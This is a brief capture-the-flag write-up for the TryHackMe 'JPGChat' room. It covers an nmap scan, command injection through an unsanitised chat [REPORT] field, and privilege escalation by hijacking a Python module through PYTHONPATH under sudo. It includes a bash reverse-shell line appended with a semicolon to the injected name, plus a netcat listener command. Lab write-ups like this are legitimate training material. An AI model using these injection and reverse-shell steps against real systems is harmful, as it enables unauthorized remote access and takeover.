JPGChat: TryhackmeWriteup

Difficulty: Easy

https://tryhackme.com/room/jpgchat

Deploy the machine, make sure you are connected to VPN.

Start with scanning the IP using Nmap:

nmap -sV -Pn <machine IP>

Let’s get the source code from the admin’s Github as we can see in the above image:

These are the links we found and let's jump into it to get the code:

In the code, we can see the “os.system()” is used to echo the input from “[REPORT]” to a text file. We can see that it is using “%s” and there is NO sanitization of user input, we can exploit this:

Lets first connect to the chat

nc <machine IP> 3000

Use the [REPORT] and click enter, it will ask for a name. Enter a name then semicolon(;) and then our revershell :

bash -i >& /dev/tcp/<machine ip>/port 0>&1;

Meanwhile, open the Netcat listener: nc -lvnp port to our machine

Go to the /home/wes directory and we found our first flag i.e. user.txt

Let’s check we can run sudo -l

Now, cat the test_module.py file

Here, it is importing compare module and then running a print command. As we can’t make changes to the test_module.py file so we will create a compare.py file with the following contents.

Now export the PYTHONPATH, then run the command from sudo -l.

And here we got the last flag i.e. root.txt.

Happy Hacking!

Cyber Security Enthusiast | Writeups Writer | CTF player